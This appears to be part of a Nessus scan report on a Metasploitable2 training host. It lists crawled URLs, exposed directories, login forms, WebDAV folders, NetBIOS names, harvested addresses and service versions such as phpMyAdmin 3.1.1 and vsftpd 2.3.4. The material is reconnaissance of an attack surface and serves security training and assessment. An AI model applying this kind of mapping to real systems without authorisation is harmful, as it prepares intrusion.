- http://metasploitable2.sicurform:8180/tomcat-docs/printer/building.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/cgi-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/class-loader-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/cluster-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/connectors.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/default-servlet.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/deployer-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/developers.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/introduction.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/jasper-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/jndi-datasource-examples-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/jndi-resources-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/logging.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/manager-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/mbeans-descriptor-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/monitoring.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/proxy-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/realm-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/security-manager-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/setup.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/ssi-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/ssl-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/status.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/virtual-hosting-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/printer/windows-service-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/proxy-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/realm-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/security-manager-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/about.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/all-classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/all-packages.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/alphaindex.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/deprecated.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/index.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/Filter-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/Filter.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/FilterChain-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/FilterChain.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/FilterConfig-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/FilterConfig.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/GenericServlet-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/GenericServlet.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/RequestDispatcher-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/RequestDispatcher.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/Servlet-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/Servlet.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletConfig-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletConfig.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContext-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContext.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextAttributeEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextAttributeEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextAttributeListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextAttributeListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletContextListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletException-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletException.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletInputStream-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletInputStream.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletOutputStream-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletOutputStream.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequest-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequest.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestAttributeEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestAttributeEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestAttributeListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestAttributeListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestWrapper-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletRequestWrapper.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletResponse-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletResponse.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletResponseWrapper-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/ServletResponseWrapper.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/SingleThreadModel-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/SingleThreadModel.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/UnavailableException-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/UnavailableException.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/Cookie-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/Cookie.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletRequest-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletRequest.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletRequestWrapper-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletRequestWrapper.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletResponseWrapper-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpServletResponseWrapper.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSession-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSession.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionActivationListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionActivationListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionAttributeListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionAttributeListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionBindingEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionBindingEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionBindingListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionBindingListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionContext-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionContext.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionEvent-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionEvent.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionListener-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpSessionListener.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpUtils-uses.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/HttpUtils.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/classes.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/package-summary.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/http/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/package-summary.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/javax/servlet/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/overview-summary.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/resources/gjdochtml-clean-color1.css
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/resources/gjdochtml-clean-layout.css
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/serialized-form.html
- http://metasploitable2.sicurform:8180/tomcat-docs/servletapi/tree.html
- http://metasploitable2.sicurform:8180/tomcat-docs/setup.html
- http://metasploitable2.sicurform:8180/tomcat-docs/ssi-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/ssl-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/status.html
- http://metasploitable2.sicurform:8180/tomcat-docs/virtual-hosting-howto.html
- http://metasploitable2.sicurform:8180/tomcat-docs/windows-service-howto.html
- http://metasploitable2.sicurform:8180/webdav
- http://metasploitable2.sicurform:8180/webdav/
- http://metasploitable2.sicurform:8180/webdav/index.html
- http://metasploitable2.sicurform:8180/webdav/tomcat-power.gif
- http://metasploitable2.sicurform:8180/webdav/tomcat.gif

Attached is a copy of the sitemap file.
20108 - Web Server / Application favicon.ico Vendor Fingerprinting
-
Synopsis
The remote web server contains a graphic image that is prone to information disclosure.
Description
The 'favicon.ico' file found on the remote web server belongs to a popular web server. This may be used to fingerprint the web server.
Solution
Remove the 'favicon.ico' file or create a custom one for your site.
Risk Factor
None
Plugin Information
Published: 2005/10/28, Modified: 2020/06/12
Plugin Output

tcp/8180/www


MD5 fingerprint : 4644f2d45601037b8423d45e13194c93
Web server : Apache Tomcat or Alfresco Community

11032 - Web Server Directory Enumeration
-
Synopsis
It is possible to enumerate directories on the web server.
Description
This plugin attempts to determine the presence of various common directories on the remote web server. By sending a request for a directory, the web server response code indicates if it is a valid directory or not.
See Also
Solution
n/a
Risk Factor
None
References
XREF OWASP:OWASP-CM-006
Plugin Information
Published: 2002/06/26, Modified: 2024/06/07
Plugin Output

tcp/80/www


The following directories were discovered:
/cgi-bin, /doc, /test, /icons, /phpMyAdmin, /twiki/bin

While this is not, in and of itself, a bug, you should manually inspect
these directories to ensure that they are in compliance with company
security standards

11032 - Web Server Directory Enumeration
-
Synopsis
It is possible to enumerate directories on the web server.
Description
This plugin attempts to determine the presence of various common directories on the remote web server. By sending a request for a directory, the web server response code indicates if it is a valid directory or not.
See Also
Solution
n/a
Risk Factor
None
References
XREF OWASP:OWASP-CM-006
Plugin Information
Published: 2002/06/26, Modified: 2024/06/07
Plugin Output

tcp/8180/www


The following directories were discovered:
/admin, /jsp-examples, /servlets-examples

While this is not, in and of itself, a bug, you should manually inspect
these directories to ensure that they are in compliance with company
security standards

The following directories require authentication:
/host-manager/html, /manager/html

49705 - Web Server Harvested Email Addresses
-
Synopsis
Email addresses were harvested from the web server.
Description
Nessus harvested HREF mailto: links and extracted email addresses by crawling the remote web server.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2010/10/04, Modified: 2018/05/24
Plugin Output

tcp/80/www



The following email address has been gathered :


- 'SomeWikiName@somewhere.test', referenced from :
/twiki/TWikiHistory.html

49705 - Web Server Harvested Email Addresses
-
Synopsis
Email addresses were harvested from the web server.
Description
Nessus harvested HREF mailto: links and extracted email addresses by crawling the remote web server.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2010/10/04, Modified: 2018/05/24
Plugin Output

tcp/8180/www



The following email addresses have been gathered :


- 'craigmcc@apache.org', referenced from :
/tomcat-docs/appdev/printer/index.html
/tomcat-docs/appdev/index.html
/tomcat-docs/appdev/
/tomcat-docs/appdev/printer/

- 'yoavs@apache.org', referenced from :
/tomcat-docs/architecture/printer/
/tomcat-docs/architecture/index.html
/tomcat-docs/architecture/printer/index.html
/tomcat-docs/architecture/

- 'users@tomcat.apache.org', referenced from :
/

- 'jfarcand@apache.org', referenced from :
/tomcat-docs/architecture/
/tomcat-docs/architecture/printer/index.html
/tomcat-docs/architecture/printer/
/tomcat-docs/architecture/index.html

- 'fhanik@apache.org', referenced from :
/tomcat-docs/architecture/printer/index.html
/tomcat-docs/architecture/
/tomcat-docs/architecture/printer/
/tomcat-docs/architecture/index.html

- 'dev@tomcat.apache.org', referenced from :
/

11419 - Web Server Office File Inventory
-
Synopsis
The remote web server hosts office-related files.
Description
This plugin connects to the remote web server and attempts to find office-related files such as .doc, .ppt, .xls, .pdf etc.
Solution
Make sure that such files do not contain any confidential or otherwise sensitive information and that they are only accessible to those with valid credentials.
Risk Factor
None
Plugin Information
Published: 2003/03/19, Modified: 2022/04/11
Plugin Output

tcp/80/www


The following office-related files are available on the remote server :

- Adobe Acrobat files (.pdf) :
/mutillidae/documentation/mutillidae-installation-on-xampp-win7.pdf

11419 - Web Server Office File Inventory
-
Synopsis
The remote web server hosts office-related files.
Description
This plugin connects to the remote web server and attempts to find office-related files such as .doc, .ppt, .xls, .pdf etc.
Solution
Make sure that such files do not contain any confidential or otherwise sensitive information and that they are only accessible to those with valid credentials.
Risk Factor
None
Plugin Information
Published: 2003/03/19, Modified: 2022/04/11
Plugin Output

tcp/8180/www


The following office-related files are available on the remote server :

- Adobe Acrobat files (.pdf) :
/tomcat-docs/architecture/requestProcess/requestProcess.pdf
/tomcat-docs/architecture/startup/serverStartup.pdf
11422 - Web Server Unconfigured - Default Install Page Present
-
Synopsis
The remote web server is not configured or is improperly configured.
Description
The remote web server uses its default welcome page. Therefore, it's probable that this server is not used at all or is serving content that is meant to be hidden.
Solution
Disable this service if you do not use it.
Risk Factor
None
Plugin Information
Published: 2003/03/20, Modified: 2018/08/15
Plugin Output

tcp/8180/www


The default welcome page is from Tomcat.

10662 - Web mirroring
-
Synopsis
Nessus can crawl the remote website.
Description
This plugin makes a mirror of the remote website(s) and extracts the list of CGIs that are used by the remote host.

It is suggested that you change the number of pages to mirror in the 'Options' section of the client.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2001/05/04, Modified: 2025/02/12
Plugin Output

tcp/80/www


Webmirror performed 100 queries in 3s (33.0333 queries per second)

The following CGIs have been discovered :


+ CGI : /phpMyAdmin/phpmyadmin.css.php
Methods : GET
Argument : js_frame
Value: right
Argument : nocache
Value: 2457687233
Argument : token
Value: 2af300223d1ba6b6d6884495d0613bc5


+ CGI : /phpMyAdmin/index.php
Methods : POST
Argument : db
Argument : lang
Value: en-utf-8
Argument : pma_password
Argument : pma_username
Argument : server
Value: 1
Argument : table
Argument : token
Value: 2af300223d1ba6b6d6884495d0613bc5


+ CGI : /mutillidae/index.php
Methods : GET
Argument : do
Value: toggle-security
Argument : page
Value: notes.php
Argument : username
Value: anonymous


+ CGI : /mutillidae/
Methods : GET
Argument : page
Value: source-viewer.php


+ CGI : /rdiff/TWiki/TWikiHistory
Methods : GET
Argument : rev1
Value: 1.8
Argument : rev2
Value: 1.7


+ CGI : /view/TWiki/TWikiHistory
Methods : GET
Argument : rev
Value: 1.7


+ CGI : /oops/TWiki/TWikiHistory
Methods : GET
Argument : param1
Value: 1.10
Argument : template
Value: oopsrev


+ CGI : /twiki/bin/view/Main/WebHome
Methods : GET
Argument : topic


+ CGI : /twiki/bin/search/Main/SearchResult
Methods : GET
Argument : search


+ CGI : /twiki/bin/view/Main/WebHome/twiki/bin/edit/Main/WebHome
Methods : GET
Argument : t
Value: 1750325868


+ CGI : /twiki/bin/view/Main/WebHome/twiki/bin/search/Main/SearchResult
Methods : GET
Argument : regex
Value: on
Argument : scope
Value: text
Argument : search
Value: Web%20*Home%5B%5EA-Za-z%5D


+ CGI : /twiki/bin/view/Main/WebHome/twiki/bin/view/Main/WebHome
Methods : GET
Argument : rev
Value: 1.18
Argument : skin
Value: print


+ CGI : /twiki/bin/view/Main/WebHome/twiki/bin/rdiff/Main/WebHome
Methods : GET
Argument : rev1
Value: 1.19
Argument : rev2
Value: 1.18


+ CGI : /twiki/bin/view/Main/WebHome/twiki/bin/oops/Main/WebHome
Methods : GET
Argument : param1
Value: 1.20
Argument : param2
Value: 1.20
Argument : template
Value: oopsmore


+ CGI : /twiki/bin/view/Main/WebHomemailto:webmaster@your.company
Methods : GET
Argument : subject
Value: TWiki Feedback on Main.WebHome


+ CGI : /dvwa/login.php
Methods : POST
Argument : Login
Value: Login
Argument : password
Argument : username


+ CGI : /twiki/bin/oops/Main/WebHomemailto:webmasteryour/company
Methods : GET
Argument : template
Value: oopsnoweb

Directory index found at /dav/
Directory index found at /test/
Directory index found at /test/testoutput/
Directory index found at /mutillidae/styles/
Directory index found at /mutillidae/styles/ddsmoothmenu/
Directory index found at /mutillidae/documentation/
Directory index found at /dvwa/dvwa/css/
Directory index found at /dvwa/dvwa/
Directory index found at /dvwa/dvwa/images/
Directory index found at /dvwa/dvwa/includes/
Directory index found at /dvwa/dvwa/js/
Directory index found at /dvwa/dvwa/includes/DBMS/

10662 - Web mirroring
-
Synopsis
Nessus can crawl the remote website.
Description
This plugin makes a mirror of the remote website(s) and extracts the list of CGIs that are used by the remote host.

It is suggested that you change the number of pages to mirror in the 'Options' section of the client.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2001/05/04, Modified: 2025/02/12
Plugin Output

tcp/8180/www


Webmirror performed 551 queries in 24s (22.0958 queries per second)

The following CGIs have been discovered :


+ CGI : /jsp-examples/jsp2/el/implicit-objects.jsp
Methods : GET
Argument : foo


+ CGI : /jsp-examples/jsp2/el/functions.jsp
Methods : GET
Argument : foo


+ CGI : /admin/j_security_check
Methods : POST
Argument : j_password
Argument : j_username


+ CGI : /jsp-examples/num/numguess.jsp
Methods : GET
Argument : guess


+ CGI : /jsp-examples/error/err.jsp
Methods : GET
Argument : name
Value: audi
Argument : submit
Value: Submit


+ CGI : /jsp-examples/sessions/carts.jsp
Methods : GET
Argument : item
Argument : submit
Value: remove


+ CGI : /jsp-examples/checkbox/checkresult.jsp
Methods : GET
Argument : fruit
Value: melons
Argument : submit
Value: Submit


+ CGI : /jsp-examples/colors/colrs.jsp
Methods : GET,POST
Argument : action
Value: Hint
Argument : color1
Argument : color2


+ CGI : /jsp-examples/cal/cal1.jsp
Methods : GET
Argument : action
Value: Submit
Argument : email
Argument : name


+ CGI : /servlets-examples/servlet/RequestParamExample
Methods : POST
Argument : firstname
Argument : lastname


+ CGI : /servlets-examples/servlet/CookieExample
Methods : POST
Argument : cookiename
Argument : cookievalue


+ CGI : /servlets-examples/servlet/SessionExample;jsessionid=AF7481CB01B7F78DFE04CCC70B5470C0
Methods : GET,POST
Argument : dataname
Value: foo
Argument : datavalue

11424 - WebDAV Detection
-
Synopsis
The remote server is running with WebDAV enabled.
Description
WebDAV is an industry standard extension to the HTTP specification.
It adds a capability for authorized users to remotely add and manage the content of a web server.

If you do not use this extension, you should disable it.
Solution
http://support.microsoft.com/default.aspx?kbid=241520
Risk Factor
None
Plugin Information
Published: 2003/03/20, Modified: 2011/03/14
Plugin Output

tcp/80/www

24004 - WebDAV Directory Enumeration
-
Synopsis
Several directories on the remote host are DAV-enabled.
Description
WebDAV is an industry standard extension to the HTTP specification.
It adds a capability for authorized users to remotely add and manage the content of a web server.

If you do not use this extension, you should disable it.
Solution
Disable DAV support if you do not use it.
Risk Factor
None
Plugin Information
Published: 2007/01/11, Modified: 2011/03/14
Plugin Output

tcp/80/www

The following directories are DAV enabled :
- /dav/

10150 - Windows NetBIOS / SMB Remote Host Information Disclosure
-
Synopsis
It was possible to obtain the network name of the remote host.
Description
The remote host is listening on UDP port 137 or TCP port 445, and replies to NetBIOS nbtscan or SMB requests.

Note that this plugin gathers information to be used in other plugins, but does not itself generate a report.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 1999/10/12, Modified: 2021/02/10
Plugin Output

udp/137/netbios-ns

The following 7 NetBIOS names have been gathered :

04CBEBC48A57 = Computer name
04CBEBC48A57 = Messenger Service
04CBEBC48A57 = File Server Service
__MSBROWSE__ = Master Browser
WORKGROUP = Workgroup / Domain name
WORKGROUP = Master Browser
WORKGROUP = Browser Service Elections

This SMB server seems to be a Samba server - its MAC address is NULL.

17219 - phpMyAdmin Detection
-
Synopsis
The remote web server hosts a database management application written in PHP.
Description
The remote host is running phpMyAdmin, a web-based MySQL administration tool written in PHP.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2005/02/25, Modified: 2022/06/01
Plugin Output

tcp/80/www


The following instance of phpMyAdmin was detected on the remote host :

Version : 3.1.1
URL : http://metasploitable2.sicurform/phpMyAdmin/

52703 - vsftpd Detection
-
Synopsis
An FTP server is listening on the remote port.
Description
The remote host is running vsftpd, an FTP server for UNIX-like systems written in C.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2011/03/17, Modified: 2019/11/22
Plugin Output

tcp/21/ftp


Source : 220 (vsFTPd 2.3.4)
Version : 2.3.4
© 2025 Tenable™, Inc. All rights reserved.